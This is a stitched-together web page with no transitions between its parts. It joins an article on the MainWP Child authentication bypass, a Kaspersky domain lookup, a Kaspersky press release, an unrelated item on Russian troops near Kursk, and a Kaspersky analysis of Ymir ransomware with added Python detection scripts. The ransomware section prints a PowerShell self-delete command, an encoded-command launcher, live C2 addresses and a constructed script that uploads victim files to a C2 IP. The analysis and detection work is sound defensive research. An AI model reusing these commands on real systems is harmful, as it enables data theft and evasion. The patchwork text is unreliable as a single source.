MainWP, a plugin widely used for managing multiple WordPress sites from a single dashboard, has left a critical security vulnerability unpatched, despite being informed of the issue.
This flaw, present in the MainWP Child plugin used by over 700,000 websites, allows unauthenticated attackers to access websites with administrator privileges, potentially compromising sensitive data and user trust.
Authentication bypass problem
The vulnerability, classified as an authentication bypass, exists within the MainWP Child plugin due to an insecure connection setup between the MainWP Child and Dashboard plugins. When linking a MainWP Child site to a central Dashboard, the only required information is the site's URL and the administrator username — no password is necessary. This weak verification process allows attackers to exploit the connection and gain admin access simply by submitting a username, bypassing password checks entirely.
Within the plugin's register_site function, the setup process includes checks for certain parameters, such as user and pubkey. However, if both are supplied, the plugin's login function grants administrative access without enforcing a password requirement. This design flaw leaves sites with unprotected MainWP Child installations vulnerable to unauthorized logins. Notably, sites are only protected if they manually enable the “Require unique security ID” feature, which is off by default, thus leaving many installations exposed.
The flaw has been assigned a CVSS score of 9.2 (Critical) and is tracked as CVE-2024-10783.
Disclosure and response
Security researcher Sean Murphy, who identified the issue, disclosed it to MainWP and to Wordfence's bug bounty program. On November 2, 2024, Wordfence initially validated the report but later ruled the issue out of scope, describing it as a “known feature” rather than a vulnerability. Wordfence explained that this functionality, documented in MainWP's usage guidelines, was intentional and included user warnings. MainWP directly rejected the report on November 11, asserting the design's validity and confirming that the software “works as designed,” thus declining to patch the issue.
Murphy expressed dismay over MainWP's stance, pointing out that this is not the first instance of an authentication bypass vulnerability in the MainWP Child plugin. Similar flaws have been found and patched in the past, raising questions about MainWP's decision not to address this current vulnerability. Murphy argues that MainWP's approach fails to balance usability with necessary security protections.
Implications and security recommendations
MainWP's refusal to patch this vulnerability exposes managed sites to a substantial risk of takeover attacks, especially if left unconnected to a dashboard or if security configurations remain at default settings. The vendor's position underscores a fundamental disagreement over the nature of security risks: whereas many in the cybersecurity field consider insecure design a vulnerability in itself, MainWP and Wordfence's decisions suggest otherwise, emphasizing intention over security outcomes.
MainWP's warning when the plugin is left in the vulnerable state (image: kernelmode.blog)
For WordPress site administrators using MainWP Child, Murphy has recommended alternative security measures, such as enabling the “Require unique security ID” option, which, when configured, provides an additional verification layer. Additionally, security providers can deploy virtual patches on web application firewalls to detect and mitigate potential exploit attempts. Murphy provided a proof-of-concept (PoC) exploit, primarily for security teams, to help them recognize malicious activity targeting this vulnerability.
Website admins are recommended to perform the following actions:
Enable “Require unique security ID” to prevent unauthorized logins.
Use a Web Application Firewall (WAF) to detect and block exploit attempts by analyzing request patterns based on known attack signatures.
Keep all plugins, themes, and WordPress core updated, and assess installed plugins for potential risks, including intentional design flaws that could jeopardize security.
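To make the design point concrete, the following Python model is an added example, not MainWP's PHP and not a description of its real code paths. It sketches a child-side registration handler in the shape the article describes (a request carrying a user name and a public key is enough to link the site), next to a hardened version that refuses to link at all unless a pre-shared unique security ID is configured and presented, compares it in constant time, and will not silently re-link an already linked site to a different Dashboard key. The names SiteState, register_site_insecure, register_site_hardened, the uniqueId request field and the single-use handling of the ID are assumptions of this model.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass
class SiteState:
    """Per-site state on the child side. Hypothetical model, not MainWP's data model."""
    admin_user: str
    require_unique_id: bool = False      # the optional, off-by-default switch the article names
    unique_id: Optional[str] = None      # secret the site admin copies into the Dashboard
    linked_pubkey: Optional[str] = None  # Dashboard public key accepted at link time


def register_site_insecure(site: SiteState, request: dict) -> Tuple[bool, str]:
    """Models the behaviour described above: a caller that supplies a 'user' and a
    'pubkey' is linked as that user; no password is involved. The only gate is the
    optional unique ID, and a freshly installed site has none configured."""
    if not request.get("user") or not request.get("pubkey"):
        return False, "missing user or pubkey"
    if request["user"] != site.admin_user:
        return False, "unknown user"
    if site.require_unique_id and request.get("uniqueId") != site.unique_id:
        return False, "bad unique id"
    site.linked_pubkey = request["pubkey"]      # attacker-controlled key is now trusted
    return True, "linked as " + request["user"]


def register_site_hardened(site: SiteState, request: dict) -> Tuple[bool, str]:
    """Hardened model: linking is refused unless a secret is configured, the caller
    proves possession of it (constant-time compare), and an already linked site
    cannot be re-linked to a different Dashboard key without unlinking first."""
    if not request.get("user") or not request.get("pubkey"):
        return False, "missing user or pubkey"
    if request["user"] != site.admin_user:
        return False, "unknown user"
    if not site.unique_id:
        return False, "no security id configured: refusing to link"
    supplied = (request.get("uniqueId") or "").encode()
    if not hmac.compare_digest(supplied, site.unique_id.encode()):
        return False, "bad unique id"
    if site.linked_pubkey is not None and site.linked_pubkey != request["pubkey"]:
        return False, "already linked to a different dashboard; unlink first"
    site.linked_pubkey = request["pubkey"]
    site.unique_id = None       # single-use in this model: a fresh ID is needed to re-link
    return True, "linked as " + request["user"]


def new_unique_id() -> str:
    """What the child side should generate and display to its administrator."""
    return secrets.token_urlsafe(24)


if __name__ == "__main__":
    attacker = {"user": "admin", "pubkey": "ATTACKER-KEY"}
    print("insecure:", register_site_insecure(SiteState("admin"), attacker))
    print("hardened:", register_site_hardened(SiteState("admin"), attacker))
```

The difference that matters is the failure mode of the default: in the insecure model an unconfigured site accepts the first key it is shown, while the hardened model treats "no secret configured" as "not linkable" rather than "open to anyone".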
About Alex Lekander
Alex is the founder and Editor-in-Chief of CyberInsider.com. His background and expertise includes digital privacy, security, and tech journalism. When he’s not working behind a screen, Alex is probably tinkering with a boat or enjoying the outdoors.
Kaspersky OpenTip report (https://opentip.kaspersky.com/https%3A%2...tab=lookup) for web address https://cyberinsider.com/700000-wordpres...available/: verdict Good.
Overview: IPv4 count ≈ 6; files count 0. Domain cyberinsider.com, created 26 Jun 1996 17:00, expires 25 Jun 2028 18:00. Registrar: NAMECHEAP INC. Registration organization: Privacy service provided by Withheld for Privacy ehf.
https://www.kaspersky.com/about/press-re...in-h1-2024 Kaspersky achieves 25% increase in APT detection with machine learning
October 2, 2024
Kaspersky’s Global Research and Analysis Team (GReAT) has recorded a 25% increase in the detection of advanced persistent threats (APTs) during the first half of 2024. By leveraging machine learning techniques in its internal service, GReAT uncovered thousands of new advanced threats targeting government, finance, enterprise, and telecommunications sectors. These findings were achieved by analyzing global cyberthreat data from the Kaspersky Security Network (KSN).
The machine learning models employed in Kaspersky’s solutions use techniques such as Random Forest and term frequency–inverse document frequency (TF-IDF) to process vast amounts of data, enabling faster and more accurate detection of subtle threats. This combination of ML methods allows for the identification of indicators of compromise (IoCs) that traditional detection systems might overlook, leading to more precise anomaly detection and a significant improvement in overall threat detection capabilities.
Kaspersky’s ongoing use of machine learning has allowed its systems to process millions of data points daily, providing real-time insights into emerging threats. This has resulted in a 25% increase in threat detections for the first half of 2024, significantly enhancing the ability to reduce response times and mitigate cyber risks.
“The results have exceeded our expectations,” said Amin Hasbini, Head of the META Research Center at Kaspersky’s GReAT. “These technologies improve detection accuracy and foster proactive defense strategies, helping organizations stay ahead of evolving cyber threats. The future of cybersecurity lies in ethically harnessing these tools to ensure a safer digital environment for all.”
Kaspersky’s machine learning models are regularly refined and updated with new data to maintain their effectiveness in a constantly changing cyberthreat landscape. As new attack vectors emerge, these models are monitored and tuned to provide timely insights, strengthening defenses and enhancing organizational resilience.
The research results will be discussed at GITEX 2024, where Kaspersky will participate in a panel on the impact of AI on cybersecurity. To learn more about machine learning in threat hunting, visit Securelist.com.
The Russian military has assembled a force of some 50,000 to 100,000 soldiers in preparation for an attack on Ukrainian-occupied Russian territory in the Kursk region, the New York Times reports. Many North Koreans are part of the force that is to recapture the territory.
In recent months, Russia has already systematically recaptured territory it suddenly lost in a Ukrainian surprise attack in August. And now, according to American sources, the Russian military seems all set for a much larger-scale operation to take back all the lost territory. It has assembled 100,000 troops to do so, including reportedly an unknown number of North Korean soldiers. The Russian counteroffensive is said to begin in the coming days, according to Ukrainian sources.
(SR for Tagtik/Source: The New York Times/Illustration: Filip Andrejevic for Unsplash)
Eduardo Ovalle
Introduction
In a recent incident response case, we discovered a new and notable ransomware family in active use by the attackers, which we named “Ymir”. The artifact has interesting features for evading detection, including a large set of operations performed in memory with the help of the malloc, memmove and memcmp function calls.
In the case we analyzed, the attacker was able to gain access to the system via PowerShell remote control commands. After that, they installed multiple tools for malicious actions, such as Process Hacker and Advanced IP Scanner. Eventually, after reducing system security, the adversary ran Ymir to achieve their goals.
In this post, we provide a detailed analysis of the Ymir ransomware, as well as the tactics, techniques and procedures (TTPs) employed by the attackers.
Analysis
Static analysis
Our analysis began with a basic inspection of the artifact. We started by analyzing its properties, such as the file type, and relevant strings and capabilities, as shown in the table and images below.
Hash Value
MD5 12acbb05741a218a1c83eaa1cfc2401f
SHA-1 3648359ebae8ce7cacae1e631103659f5a8c630e
SHA-256 cb88edd192d49db12f444f764c3bdc287703666167a4ca8d533d51f86ba428d8
File type identification
Although the binary does not appear to be packed (its entropy is not high enough), the imports of malloc, memmove and memcmp indicate that it can allocate memory at runtime and copy code and data into it.
Calls for memory operation functions
The binary also suspiciously imports functions, such as CryptAcquireContextA, CryptReleaseContext, CryptGenRandom, TerminateProcess and WinExec, from operating system libraries. These API calls are typically found in various ransomware samples.
Even though most of the sample information is unpacked in memory during runtime, we were able to find some useful indicators in the binary strings, including the ransom note filename and contents in a PDF file, encryption extension, PowerShell commands, and some hashes used by the encryption algorithms, as shown in the following images.
PDF contents
PowerShell auto-delete command and encryption hashes
The attacker used the MinGW compiler, a native Windows port of the GNU Compiler Collection (GCC).
Compiler string
The following table shows other useful string indicators we found in the course of our analysis.
Type | Value | Description
String (command) | powershell -w h -c Start-Sleep -Seconds 5; Remove-Item -Force -Path | Auto-delete command executed via PowerShell.
String (URL) | hxxps://github[.]com/qTox/qTox/releases/download/v1.17.6/setup-qtox-x86_64-release.exe | Present in the PDF; software (qTox client) for contacting the attackers.
String | 6C5oy2dVr6 | Encryption extension.
String (filename) | INCIDENT_REPORT.pdf | Ransom note PDF filename. PDFs are placed in various directories.
String (date) | D:20240831154833-06’00’ | PDF creation date metadata.
String | x64dbg | Debugger name.
One interesting fact is that the PDF creation date was August 31, 2024, which matches the binary compilation timestamp (2024-08-31), as shown in the image below.
Static analysis also shows that the PDF used as the ransom note is present in the .data section of the binary. The information hardcoded in this kind of file is very useful for creating detection rules and indicators of compromise.
PDF file containing a ransom note
After reaching the main function, the malware executes another function with calls to other functions to get system information. To streamline our analysis, we renamed this function to Get_System_Information:
Malware entry point
Get_System_Information function and its sub-functions
The artifact gathers system information by using the API calls listed below.
GetSystemTimeAsFileTime: retrieves the current system date and time.
GetCurrentProcessId: gets the current process identifier (PID).
GetCurrentThreadId: retrieves the identifier of the calling thread.
GetTickCount: returns the number of milliseconds elapsed since the system started. The sample uses it for timing checks that reveal a debugger or sandbox slowing down execution.
QueryPerformanceCounter: retrieves the current value of the performance counter, which can be used for time-interval measurements.
System information gathering
The malware also contains some execution restrictions which are activated when certain parameters are set. For example, the --path parameter disables self-delete, allowing the attacker to reuse the binary for other directories.
The artifact is not deleted when running with the --path parameter
While reverse-engineering the sample, we found that it borrowed code from functions related to CryptoPP, an open-source cryptographic library written in C++.
CryptoPP functions
The malware also has a hardcoded list of file name extensions to exclude from encryption.
File name extensions to ignore
Dynamic analysis
While running the ransomware, we spotted hundreds of calls to the memmove function. After analyzing the data, we found that it loaded small pieces of instructions into memory for performing malicious functions. The following image shows a fragment of the malware loading environment variables after calling memmove.
Environment variables loaded into memory
The malware constantly uses the memmove function while enumerating subdirectories and files inside the affected system, so they can be encrypted later.
Directory enumeration
It also uses memmove to load strings that contain locations in the victim’s filesystem and are used for comparing with common directory names during runtime.
Strings loaded via memmove
The sample uses RtlCopyMemory (ntdll.dll) to copy data while loading additional libraries at runtime, such as CRYPTSP.dll, rsaenh.dll, bcrypt.dll and kernelbase.dll.
Runtime loading of DLLs
The artifact uses the stream cipher ChaCha20 algorithm to encrypt files, appending the extension .6C5oy2dVr6 to each encrypted file.
ChaCha20 encryption
Additionally, it copies the PDF contents from the .data section and uses the _write and _fsopen functions to generate a ransom note in PDF format within every directory in the affected system.
The ransom note informs the victim about what happened to the affected system and instructs them to contact the attackers for a deal. Although the note mentions that the attackers have stolen the data from the affected machine, the malware does not have any network capabilities for data exfiltration. This leads us to believe that the adversaries would steal data with other means once they obtained access to the computer, such as through HTTP, FTP or cloud storage uploads.
Ransom note fragment
We spotted one odd string, a comment written in the Lingala language. This language is used in the Democratic Republic of the Congo, Republic of the Congo, Angola and the Central African Republic.
Comment in Lingala found during malware execution
Another interesting fact is that the sample searches for PowerShell in each subdirectory as it repeatedly calls the RtlCopyMemory function. Once PowerShell is located, the malware uses it for deleting itself. In our investigation, we copied powershell.exe into our Desktop folder, so it was used for deleting the sample.
PowerShell binary search
The following diagram shows a summary of the sample’s execution. Note that the only child process created was powershell.exe: the malware starts a new PowerShell process rather than reusing any instance already running on the system. PowerShell in turn spawns conhost.exe, the console host that Windows attaches to console applications.
Malicious processes
Process tree
The malware calls PowerShell with the cmdlet Start-Sleep to wait 5 seconds, and finally, uses the Remove-Item command to delete itself from the machine, as shown in the image below.
YARA rule
Based on our analysis of the sample, we developed the following YARA rule for detecting the threat in real time. The rule considers the file type, relevant strings and library function imports.
Telemetry
Using the above rule, we were able to query threat intelligence portals and find a similar sample submitted from Pakistan. We believe that the attacker used a VPN or Tor to hide their IP. The artifact we discovered looks like a test binary sent by the attacker to check whether it would be detected by security vendors. The sample receives a --path parameter from the command line, which specifies the directory to be encrypted. However, it neither encrypts the files nor generates a ransom note.
Execution of the test sample
What caught our attention was that this test version of the executable, similarly to the full-featured sample, did not delete itself when executed with the --path parameter, which made sense, since the adversary might want to select certain directories during the attack.
By comparing the two detections, we concluded that the final sample with the fully enabled encryption features, unlike the test variant, had extended functionality implemented in additional strings. These included the extension appended to the name of the encrypted files ( .6C5oy2dVr6) and the information present in the PDF file generated as a ransom note.
YARA matches comparison
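The following Python script is an added example, not Kaspersky's YARA rule or tooling, that ties the static findings above together so they can be checked mechanically: it matches the indicator strings from the table and the crypto/exec imports, applies a stand-in rule with the same three ingredients the YARA rule is said to use (PE file type, strings, imports), reads the COFF TimeDateStamp to reproduce the compile-date check against the ransom note's PDF creation date, and reproduces the full-versus-test comparison from the telemetry section with two constructed inputs: the stand-in for the test variant carries only the self-delete command and --path, so it still matches the rule but with fewer strings. The minimal fake PE headers, the rule condition, the chosen timestamp and all function names are assumptions; only the strings and import names come from the page.

```python
import re
import struct
from datetime import datetime, timedelta, timezone
from typing import Optional, Set

# Indicator strings taken from the analysis above, as ASCII bytes.
INDICATORS = {
    "ext":      b"6C5oy2dVr6",
    "note":     b"INCIDENT_REPORT.pdf",
    "qtox_url": b"github.com/qTox/qTox/releases/download/v1.17.6/setup-qtox-x86_64-release.exe",
    "self_del": b"Start-Sleep -Seconds 5; Remove-Item -Force -Path",
    "path_arg": b"--path",
}
IMPORTS = [b"CryptAcquireContextA", b"CryptGenRandom", b"TerminateProcess", b"WinExec"]


def pe_timestamp(buf: bytes) -> Optional[datetime]:
    """COFF header TimeDateStamp as an aware UTC datetime, or None if buf is not a PE image."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", buf, 0x3C)
    if e_lfanew + 24 > len(buf) or buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # after the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    (stamp,) = struct.unpack_from("<I", buf, e_lfanew + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


# PDF date: D:YYYYMMDDHHmmSS then Z or +/-HH'mm'; the typographic quote on the page is accepted too.
_PDF_DATE = re.compile(
    r"^D:(\d{4})(\d{2})?(\d{2})?(\d{2})?(\d{2})?(\d{2})?(?:([Zz+-])(\d{2})?['\u2019]?(\d{2})?)?")


def pdf_creation_date(value: str) -> datetime:
    m = _PDF_DATE.match(value.strip())
    if not m:
        raise ValueError("not a PDF date string: %r" % value)
    g = m.groups()
    year, month, day = int(g[0]), int(g[1] or 1), int(g[2] or 1)
    hour, minute, second = (int(p or 0) for p in g[3:6])
    sign, oh, om = g[6], g[7], g[8]
    if sign in (None, "Z", "z"):
        tz = timezone.utc
    else:
        off = timedelta(hours=int(oh or 0), minutes=int(om or 0))
        tz = timezone(off if sign == "+" else -off)
    return datetime(year, month, day, hour, minute, second, tzinfo=tz)


def same_day(a: datetime, b: datetime) -> bool:
    return a.astimezone(timezone.utc).date() == b.astimezone(timezone.utc).date()


def match_indicators(buf: bytes) -> Set[str]:
    found = {name for name, s in INDICATORS.items() if s in buf}
    found |= {"import:" + imp.decode() for imp in IMPORTS if imp in buf}
    return found


def ymir_rule(buf: bytes) -> bool:
    """Stand-in for the page's rule: PE file type, the self-delete string, two or more imports."""
    found = match_indicators(buf)
    n_imports = sum(1 for n in found if n.startswith("import:"))
    return pe_timestamp(buf) is not None and "self_del" in found and n_imports >= 2


def build_fake_pe(stamp: datetime, strings) -> bytes:
    """Constructed input: only the headers pe_timestamp() reads, followed by the strings.
    Not a loadable executable and not the Ymir sample."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    coff = struct.pack("<HHIIIHH", 0x8664, 0, int(stamp.timestamp()), 0, 0, 0, 0)
    return dos + b"PE\0\0" + coff + b"\0".join(strings) + b"\0"


# Chosen to equal the PDF creation instant (15:48:33 at UTC-6), reproducing the date match noted above.
COMPILED = datetime(2024, 8, 31, 21, 48, 33, tzinfo=timezone.utc)
FULL_SAMPLE = build_fake_pe(COMPILED, list(INDICATORS.values()) + IMPORTS)
TEST_SAMPLE = build_fake_pe(COMPILED, [INDICATORS["self_del"], INDICATORS["path_arg"]] + IMPORTS)


def triage(buf: bytes, pdf_date: str) -> dict:
    compiled = pe_timestamp(buf)
    note_date = pdf_creation_date(pdf_date)
    return {
        "rule_match": ymir_rule(buf),
        "indicators": sorted(match_indicators(buf)),
        "compiled_utc": compiled.isoformat() if compiled else None,
        "note_created_utc": note_date.astimezone(timezone.utc).isoformat(),
        "same_day": compiled is not None and same_day(compiled, note_date),
    }


if __name__ == "__main__":
    for label, sample in (("full", FULL_SAMPLE), ("test", TEST_SAMPLE)):
        print(label, triage(sample, "D:20240831154833-06'00'"))
```

Run against real files, replace the constructed buffers with the file contents; the PDF date comes from the /CreationDate entry of the embedded ransom note, which the page shows as D:20240831154833-06'00'.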
At the time of our research, 12 security vendors including Kaspersky detected the threat.
The ransomware incident
In addition to analyzing the malware, we managed to investigate an incident in Colombia where the Ymir sample was obtained. Our forensic analysis revealed that crucial evidence had been lost through the attacker’s efforts to cover their tracks. We at Kaspersky GERT were able to identify that two days before the ransomware deployment, a new RustyStealer threat was detected on multiple systems, allowing the attackers to control the machines, send commands, and gather information from compromised infrastructure. Malicious activity was detected on a domain controller shortly after, including compromised access on behalf of legitimate users, including one with high privileges. The initial RustyStealer sample was a PE file compiled with Rust and deployed to Windows\Temp under the name AudioDriver2.0.exe.
Filename AudioDriver2.0.exe
Size 3334144 bytes (3.2 MB)
MD5 5ee1befc69d120976a60a97d3254e9eb
SHA-1 e6c4d3e360a705e272ae0b505e58e3d928fb1387
Kaspersky detects this sample as Trojan.Win32.Sheller.ey. It can gather information about the file system, its content is obfuscated to hinder analysis, and it loads shared modules, meaning it can call functions exported by native Windows DLLs.
This sample also connects to the C2 server 74.50.84[.]181 on port 443, detected by Kaspersky as a host for malicious files since August 2024.
C2 server
The attackers compromised the domain controller and used it to continue infiltrating systems in the targeted infrastructure. They abused compromised credentials gathered by the stealer to hop between systems using WinRM and PowerShell remote control capabilities, and then executed a set of two scripts that were confirmed to be a part of the proxy malware threat SystemBC.
Script 1: Filename 1.ps1 | Size 16239 bytes (15 KiB) | MD5 5384d704fadf229d08eab696404cbba6 | Path %windir%\temp\
Script 2: Filename 1.ps1 | Size 4209 bytes (4 KiB) | MD5 39df773139f505657d11749804953be5 | Path HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Both scripts use PowerShell to establish a covert channel to the IP address 94.158.244[.]69 on port 443. Based on the strings from the scripts we were able to obtain, we implemented YARA rules for identifying other samples and C2 servers configured with the same encoding and spotted in the wild.
SHA256 | First seen | First reported from | C2 server | Verdict
8287d54c83db03b8adcdf1409f5d1c9abb1693ac8d000b5ae75b3a296cb3061c | 2024-09-16 03:24:06 UTC | Australia | 94.158.244[.]69 |
51ffc0b7358b7611492ef458fdf9b97f121e49e70f86a6b53b93ed923b707a03 | 2024-08-18 18:59:01 UTC | Ukraine | 85.239.61[.]60 | UDS:Trojan.PowerShell.Dnoper.posh
b087e1309f3eab6302d7503079af1ad6af06d70a932f7a6ae1421b942048e28a | 2024-08-17 02:43:55 UTC | Ukraine | 85.239.61[.]60 | Trojan.MSIL.Dnoper.sb
One of these scripts was spotted in multiple systems, collected as a script block for PowerShell that included a different approach and a different C2 system (5.255.117[.]134 on port 80). It was probably used to exfiltrate information from the infrastructure according to the following hardcoded functions and their instructions.
GetServerByFilename,
SendFile,
SearchRoot.
GetServerByFilename function
The script establishes communication with the C2 server and sends information, including a specific key that allows the attacker to identify the affected company.
The URI includes a unique key for each victim
Information that will be sent to C2 server
The SearchRoot function contains a loop that searches for all files that are included in the requested folder and checks for a specific filter: the malware only uploads files with a size greater than 40 KB that were created after a specified date.
Search function
File search procedure
The script is Base64 encoded and passed to the following command for execution.
$selfpath\powershell.exe -Version 5.1 -s -NoLogo -NoProfile -EncodedCommand <B64CMD>
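The -EncodedCommand payload is base64 over the UTF-16LE bytes of the script, so the script block can be recovered from a captured command line without running anything. The Python below is an added example, not the SystemBC script and not Kaspersky's tooling: it pulls the payload out of a command line in the shape shown above (powershell.exe also accepts abbreviated forms such as -e, -ec and -enc, which it handles), decodes it, and reports the three function names and any IP:port literal found in the recovered script. The script it decodes is a constructed stand-in that only reuses the function names, the 40 KB/creation-date filter and the C2 literal 5.255.117[.]134:80 from the text; its body, the victim key and the $selfpath placeholder are assumptions.

```python
import base64
import re
from typing import Optional

# Function names from the exfiltration script described above.
SUSPICIOUS_FUNCS = ("GetServerByFilename", "SendFile", "SearchRoot")
IPV4_PORT = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?\b")


def encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 payload following -EncodedCommand (or any unambiguous
    prefix of it, e.g. -e, -ec, -enc, which powershell.exe accepts), else None."""
    argv = cmdline.split()
    for i, arg in enumerate(argv[:-1]):
        name = arg.lstrip("-/").lower()
        if name and "encodedcommand".startswith(name):
            return argv[i + 1]
    return None


def encode_command(script: str) -> str:
    """How the attacker side produces <B64CMD>: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(payload: str) -> str:
    padded = payload + "=" * (-len(payload) % 4)   # tolerate stripped padding
    return base64.b64decode(padded).decode("utf-16-le")


def analyze(cmdline: str) -> dict:
    """Decode an encoded command line and extract the indicators worth triaging."""
    payload = encoded_command(cmdline)
    if payload is None:
        return {"encoded": False}
    script = decode_encoded_command(payload)
    funcs = [f for f in SUSPICIOUS_FUNCS
             if re.search(r"\bfunction\s+" + f + r"\b", script, re.I)]
    endpoints = sorted({(ip, int(port) if port else None)
                        for ip, port in IPV4_PORT.findall(script)})
    return {"encoded": True, "script": script, "functions": funcs, "endpoints": endpoints}


# Constructed stand-in for the SystemBC exfiltration script (not the real one): same function
# names, same size/date filter, C2 literal from the incident; everything else is made up.
SAMPLE_SCRIPT = r"""$server = "5.255.117.134:80"
$key = "VICTIM-KEY-0001"
function GetServerByFilename($name) { "http://$server/upload/$key/$name" }
function SendFile($path) { Invoke-WebRequest -Uri (GetServerByFilename (Split-Path $path -Leaf)) -Method Post -InFile $path }
function SearchRoot($root) {
    Get-ChildItem $root -Recurse -File |
        Where-Object { $_.Length -gt 40KB -and $_.CreationTime -gt (Get-Date "2024-08-01") } |
        ForEach-Object { SendFile $_.FullName }
}
SearchRoot "C:\Users"
"""

# Command line in the shape shown above; $selfpath is the page's placeholder, kept as-is.
SAMPLE_CMDLINE = (r"$selfpath\powershell.exe -Version 5.1 -s -NoLogo -NoProfile -EncodedCommand "
                  + encode_command(SAMPLE_SCRIPT))


if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print("functions:", result["functions"])
    print("endpoints:", result["endpoints"])
    print(result["script"])
```

On a real case the input is the CommandLine field of the process-creation event (Sysmon ID 1 or Security 4688 with command-line auditing enabled); the decoded script is what should be searched for the C2 address and the victim key rather than the base64 blob itself.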
According to our GERT analysis, at the time of the research, there was a service configured at this IP address (5.255.117[.]134) for uploading files that were collected with the SystemBC scripts.
Active webservice
At the same time, alerts fired on several systems for the creation and execution of the well-known programs Advanced IP Scanner and Process Hacker:
advanced_ip_scanner.exe;
processhacker-2.39-setup.exe.
Finally, two days after the initial RustyStealer intrusion, the attackers deployed the Ymir ransomware by connecting remotely and uploading the payload. Some traces of the execution were detected, in particular those associated with the PowerShell self-destruct script. Also, part of the ransom note was written to the legalnoticecaption value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, which Windows shows in the logon notice and which invites the user to look for additional details in the ransom note, INCIDENT_REPORT.pdf:
Part of the ransom note from the registry
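Two of the host artifacts above are cheap to check at scale: the self-delete chain from the process tree in the dynamic analysis (a hidden-window powershell.exe spawned by the ransomware, whose command line sleeps and then removes its parent's image path) and the ransom text planted in the logon-notice registry value. The Python below is an added example, not Kaspersky's detection logic: it runs both checks over constructed process-creation events and a constructed registry export. The Ymir drop path, the WinRM host as its parent, the explorer-spawned benign PowerShell, the exact caption text and all function names are assumptions; the command-line pattern, the registry key and value name, and the INCIDENT_REPORT.pdf reference are the page's. It also checks legalnoticetext, the sibling value, which the page does not mention.

```python
import re
from typing import Dict, List

# Event fields loosely follow Sysmon Event ID 1 / Security 4688 naming; the events are
# constructed to mirror the process tree described above.
YMIR_PATH = r"C:\Users\Public\ymir_sample.exe"   # assumed drop path: the page gives no filename
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 612, "image": YMIR_PATH,
     "parent_image": r"C:\Windows\System32\wsmprovhost.exe",     # launched over WinRM (assumption)
     "cmdline": YMIR_PATH + " --path C:\\Users"},
    {"pid": 4188, "ppid": 4120, "image": PS_PATH, "parent_image": YMIR_PATH,
     "cmdline": "powershell -w h -c Start-Sleep -Seconds 5; Remove-Item -Force -Path " + YMIR_PATH},
    {"pid": 4196, "ppid": 4188, "image": r"C:\Windows\System32\conhost.exe", "parent_image": PS_PATH,
     "cmdline": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"pid": 5012, "ppid": 1488, "image": PS_PATH, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -NoProfile -Command Get-Date"},     # benign control
]

SELF_DELETE = re.compile(
    r"Start-Sleep\s+-Seconds\s+\d+\s*;\s*Remove-Item\s+-Force\s+-Path\s+\"?([^\"]+?)\"?\s*$", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)


def ancestry(events: List[Dict], pid: int) -> List[str]:
    """Image path of pid and each ancestor present in the events, child first."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain


def find_self_delete(events: List[Dict]) -> List[Dict]:
    """PowerShell processes whose command line is the sleep-then-Remove-Item pattern;
    deletes_parent is True when the removed path is the parent's own image."""
    hits = []
    for e in events:
        if not e["image"].lower().endswith("powershell.exe"):
            continue
        m = SELF_DELETE.search(e["cmdline"])
        if not m:
            continue
        target = m.group(1).strip().lower()
        hits.append({
            "pid": e["pid"],
            "target": target,
            "deletes_parent": target == e.get("parent_image", "").lower(),
            "hidden_window": bool(HIDDEN.search(e["cmdline"])),
            "chain": ancestry(events, e["pid"]),
        })
    return hits


POLICY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
NOTE_MARKERS = re.compile(r"INCIDENT_REPORT\.pdf|encrypt|ransom", re.I)

# Constructed registry export: the caption text is invented, only the value location
# and the reference to INCIDENT_REPORT.pdf follow the incident description.
SAMPLE_REGISTRY = [
    (POLICY_KEY, "legalnoticecaption", "Your files have been encrypted. Read INCIDENT_REPORT.pdf for details."),
    (POLICY_KEY, "legalnoticetext", ""),
    (POLICY_KEY, "EnableLUA", "1"),
]


def find_ransom_notice(values) -> List[Dict]:
    """Logon-notice values under the policy key carrying ransom-note language."""
    hits = []
    for key, name, data in values:
        if key.lower() != POLICY_KEY.lower():
            continue
        if name.lower() not in ("legalnoticecaption", "legalnoticetext"):
            continue
        if data and NOTE_MARKERS.search(data):
            hits.append({"name": name.lower(), "data": data})
    return hits


if __name__ == "__main__":
    for hit in find_self_delete(SAMPLE_EVENTS):
        print("self-delete:", hit)
    for hit in find_ransom_notice(SAMPLE_REGISTRY):
        print("logon notice:", hit)
```

The parent-image comparison is the discriminating part: administrators and installers do spawn hidden PowerShell, but a process that asks PowerShell to sleep and then delete the very image that spawned it is the behaviour the dynamic analysis describes, and the captured command line also hands the responder the path of the binary to hunt for on other hosts before it is gone.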
Conclusion
